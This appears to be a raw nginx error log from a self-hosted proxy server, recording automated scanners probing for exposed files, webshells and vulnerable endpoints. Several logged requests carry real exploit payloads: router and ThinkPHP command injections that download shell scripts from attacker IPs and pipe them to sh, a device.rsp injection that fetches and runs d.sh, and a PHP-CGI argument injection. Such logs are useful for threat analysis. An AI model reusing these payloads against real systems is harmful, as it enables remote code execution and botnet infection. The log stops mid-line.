"/var/www/html/GponForm/diag_Form" failed (2: No such file or directory), client: 103.48.64.85, server: localhost-nginx-proxy-manager, request: "POST /GponForm/diag_Form?images/ HTTP/1.1", host: "127.0.0.1:80" +2026/01/24 07:42:34 [error] 351#351: *64553 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 08:02:11 [error] 352#352: *64608 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 138.68.72.233, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "91.82.83.208" +2026/01/24 08:02:11 [error] 352#352: *64607 open() "/var/www/html/.well-known/security.txt" failed (2: No such file or directory), client: 138.68.72.233, server: localhost-nginx-proxy-manager, request: "GET /.well-known/security.txt HTTP/1.1", host: "91.82.83.208" +2026/01/24 08:02:12 [error] 354#354: *66096 open() "/var/www/html/security.txt" failed (2: No such file or directory), client: 138.68.72.233, server: localhost-nginx-proxy-manager, request: "GET /security.txt HTTP/1.1", host: "91.82.83.208" +2026/01/24 08:02:12 [error] 354#354: *66095 open() "/var/www/html/.well-known/robots.txt" failed (2: No such file or directory), client: 138.68.72.233, server: localhost-nginx-proxy-manager, request: "GET /.well-known/robots.txt HTTP/1.1", host: "91.82.83.208" +2026/01/24 08:23:31 [error] 353#353: *67591 open() "/var/www/html/wiki" failed (2: No such file or directory), client: 167.94.146.50, server: localhost-nginx-proxy-manager, request: "GET /wiki HTTP/1.1", host: "91.82.83.208" +2026/01/24 08:51:49 [error] 353#353: *67603 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 221.159.119.6, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 08:51:50 [error] 353#353: *67604 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 221.159.119.6, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 09:04:29 [error] 354#354: *67608 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208" +2026/01/24 09:04:30 [error] 354#354: *67609 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C6f71068b%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C6f71068b%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C6f71068b%29%7Csh HTTP/1.1", host: "91.82.83.208" +2026/01/24 09:04:30 [error] 354#354: *67610 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /index.php?s=captcha HTTP/1.1", host: "91.82.83.208" +2026/01/24 09:15:34 [error] 354#354: *67628 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 10:37:08 [error] 361#361: *67729 open() "/var/www/html/odinhttpcall1769251028" failed (2: No such file or directory), client: 164.92.179.63, server: localhost-nginx-proxy-manager, request: "GET /odinhttpcall1769251028 HTTP/1.1", host: "91.82.83.208" +2026/01/24 10:37:08 [error] 361#361: *67730 open() "/var/www/html/sdk" failed (2: No such file or directory), client: 164.92.179.63, server: localhost-nginx-proxy-manager, request: "POST /sdk HTTP/1.1", host: "91.82.83.208" +2026/01/24 10:37:08 [error] 359#359: *67731 open() "/var/www/html/HNAP1" failed (2: No such file or directory), client: 164.92.179.63, server: localhost-nginx-proxy-manager, request: "GET /HNAP1 HTTP/1.1", host: "91.82.83.208" +2026/01/24 10:37:08 [error] 359#359: *67732 open() "/var/www/html/evox/about" failed (2: No such file or directory), client: 164.92.179.63, server: localhost-nginx-proxy-manager, request: "GET /evox/about HTTP/1.1", host: "91.82.83.208" +2026/01/24 10:37:08 [error] 359#359: *67735 open() "/var/www/html/query" failed (2: No such file or directory), client: 104.248.42.184, server: localhost-nginx-proxy-manager, request: "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 10:37:08 [error] 361#361: *67737 open() "/var/www/html/cgi-bin/authLogin.cgi" failed (2: No such file or directory), client: 134.209.238.145, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/authLogin.cgi HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 10:37:08 [error] 361#361: *67738 open() "/var/www/html/solr/admin/info/system" failed (2: No such file or directory), client: 134.209.238.145, server: localhost-nginx-proxy-manager, request: "GET /solr/admin/info/system HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 10:37:09 [error] 359#359: *67740 open() "/var/www/html/solr/admin/cores" failed (2: No such file or directory), client: 134.209.238.145, server: localhost-nginx-proxy-manager, request: "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 10:38:12 [error] 360#360: *69231 open() "/var/www/html/v2/_catalog" failed (2: No such file or directory), client: 138.197.186.56, server: localhost-nginx-proxy-manager, request: "GET /v2/_catalog HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 10:47:27 [error] 360#360: *69242 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 10:49:30 [error] 360#360: *69243 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 11:01:26 [error] 360#360: *69253 open() "/var/www/html/_next" failed (2: No such file or directory), client: 176.65.148.66, server: localhost-nginx-proxy-manager, request: "HEAD /_next HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 11:01:28 [error] 360#360: *69255 open() "/var/www/html/_next" failed (2: No such file or directory), client: 176.65.148.66, server: localhost-nginx-proxy-manager, request: "POST /_next HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 11:19:09 [error] 359#359: *69268 open() "/var/www/html/style.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:09 [error] 359#359: *69268 open() "/var/www/html/wp-content/style.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /wp-content/style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:10 [error] 359#359: *69268 open() "/var/www/html/wp-content/themes/style.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /wp-content/themes/style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:10 [error] 359#359: *69268 open() "/var/www/html/wp-admin/style.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:10 [error] 359#359: *69268 open() "/var/www/html/wp-includes/style.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:10 [error] 359#359: *69268 open() "/var/www/html/chosen.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /chosen.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:10 [error] 359#359: *69268 open() "/var/www/html/file.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /file.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:10 [error] 359#359: *69268 open() "/var/www/html/flower.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /flower.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:11 [error] 359#359: *69268 open() "/var/www/html/gifclass.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /gifclass.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:11 [error] 359#359: *69268 open() "/var/www/html/bless.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /bless.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:11 [error] 359#359: *69268 open() "/var/www/html/class-t.api.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /class-t.api.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:11 [error] 359#359: *69268 open() "/var/www/html/blurbs.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /blurbs.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:11 [error] 359#359: *69268 open() "/var/www/html/akcc.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /akcc.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:11 [error] 359#359: *69268 open() "/var/www/html/abcd.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /abcd.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:11 [error] 359#359: *69268 open() "/var/www/html/shelp.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /shelp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:12 [error] 359#359: *69268 open() "/var/www/html/cord.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /cord.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:12 [error] 359#359: *69268 open() "/var/www/html/dex.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /dex.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:12 [error] 359#359: *69268 open() "/var/www/html/wp-admin/admin-ajax.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/admin-ajax.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:12 [error] 359#359: *69268 open() "/var/www/html/file2.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /file2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:12 [error] 359#359: *69268 open() "/var/www/html/zwso.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET //zwso.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:12 [error] 359#359: *69268 open() "/var/www/html/wp-admin/zwso.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/zwso.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:13 [error] 359#359: *69268 open() "/var/www/html/wp-content/plugins/hellopress/wp_mna.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_mna.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:13 [error] 359#359: *69268 open() "/var/www/html/bolt.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /bolt.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:13 [error] 359#359: *69268 open() "/var/www/html/shlo.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /shlo.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:13 [error] 359#359: *69268 open() "/var/www/html/133.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /133.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:13 [error] 359#359: *69268 open() "/var/www/html/ahax.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /ahax.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:13 [error] 359#359: *69268 open() "/var/www/html/php8.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /php8.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:14 [error] 359#359: *69268 open() "/var/www/html/lufix1.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /lufix1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:14 [error] 359#359: *69268 open() "/var/www/html/witmm.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /witmm.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:14 [error] 359#359: *69268 open() "/var/www/html/wp-admin/css/index.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:14 [error] 359#359: *69268 open() "/var/www/html/wp-content/plugins/index.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:14 [error] 359#359: *69268 open() "/var/www/html/wp-content/index.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /wp-content/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:14 [error] 359#359: *69268 open() "/var/www/html/ioxi-o.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /ioxi-o.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:15 [error] 359#359: *69268 open() "/var/www/html/222.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /222.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:15 [error] 359#359: *69268 open() "/var/www/html/files.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /files.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:15 [error] 359#359: *69268 open() "/var/www/html/wp-editor.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /wp-editor.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:15 [error] 359#359: *69268 open() "/var/www/html/txets.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /txets.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:15 [error] 359#359: *69268 open() "/var/www/html/wp-content/txets.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /wp-content/txets.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:15 [error] 359#359: *69268 open() "/var/www/html/wp-admin/txets.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/txets.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:16 [error] 359#359: *69268 open() "/var/www/html/postnews.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /postnews.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:16 [error] 359#359: *69268 open() "/var/www/html/wp-content/postnews.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /wp-content/postnews.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:19:16 [error] 359#359: *69268 open() "/var/www/html/wp-admin/postnews.php" failed (2: No such file or directory), client: 104.28.235.57, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/postnews.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/24 11:36:23 [error] 359#359: *69279 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 11:46:43 [error] 359#359: *69289 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 12:24:13 [error] 361#361: *69316 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 12:33:56 [error] 361#361: *69330 open() "/var/www/html/.env" failed (2: No such file or directory), client: 170.64.130.96, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/24 12:33:56 [error] 361#361: *69331 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 170.64.130.96, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.83.208" +2026/01/24 13:11:38 [error] 361#361: *69368 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 13:58:27 [error] 359#359: *70958 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 14:46:00 [error] 361#361: *71000 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 15:33:55 [error] 361#361: *71048 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 16:31:38 [error] 368#368: *71090 open() "/var/www/html/device.rsp" failed (2: No such file or directory), client: 204.76.203.49, server: localhost-nginx-proxy-manager, request: "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Bwget+http%3A%2F%2F204.76.203.49%2Fd.sh%3Bchmod+777+d.sh%3B.%2Fd.sh+27telnet%3Brm+-f+d.sh HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 16:46:24 [error] 365#365: *71102 open() "/var/www/html/device.rsp" failed (2: No such file or directory), client: 204.76.203.49, server: localhost-nginx-proxy-manager, request: "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Bwget+http%3A%2F%2F204.76.203.49%2Fd.sh%3Bchmod+777+d.sh%3B.%2Fd.sh+27telnet%3Brm+-f+d.sh HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 17:27:43 [error] 366#366: *72597 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 18:37:37 [error] 365#365: *72692 "/var/www/html/bins/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bins/ HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 18:44:36 [error] 365#365: *72694 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 19:05:17 [error] 366#366: *74189 open() "/var/www/html/_next" failed (2: No such file or directory), client: 176.65.148.66, server: localhost-nginx-proxy-manager, request: "HEAD /_next HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 19:05:20 [error] 366#366: *74191 open() "/var/www/html/_next" failed (2: No such file or directory), client: 176.65.148.66, server: localhost-nginx-proxy-manager, request: "POST /_next HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 19:05:59 [error] 366#366: *74192 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 109.236.61.69, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 19:29:49 [error] 368#368: *74207 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 20:35:21 [error] 365#365: *74219 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:00:29 [error] 365#365: *74222 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:13:15 [error] 365#365: *74229 "/var/www/html/bin/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bin/ HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:19:19 [error] 367#367: *74231 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 204.76.203.6, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:20:07 [error] 367#367: *74258 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 109.236.61.69, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:46:00 [error] 367#367: *74297 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:15 [error] 367#367: *74301 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:15 [error] 367#367: *74301 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:15 [error] 367#367: *74301 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:15 [error] 367#367: *74301 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:15 [error] 367#367: *74301 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:16 [error] 367#367: *74301 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:16 [error] 367#367: *74301 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:16 [error] 367#367: *74301 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:16 [error] 367#367: *74301 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:16 [error] 367#367: *74301 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:16 [error] 367#367: *74301 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:16 [error] 367#367: *74301 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:16 [error] 367#367: *74301 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:16 [error] 367#367: *74301 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:16 [error] 367#367: *74301 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:16 [error] 367#367: *74301 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:16 [error] 367#367: *74301 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:16 [error] 367#367: *74301 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:17 [error] 367#367: *74301 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.231.225, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/24 21:51:17 [error] 367#367: *74301 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed 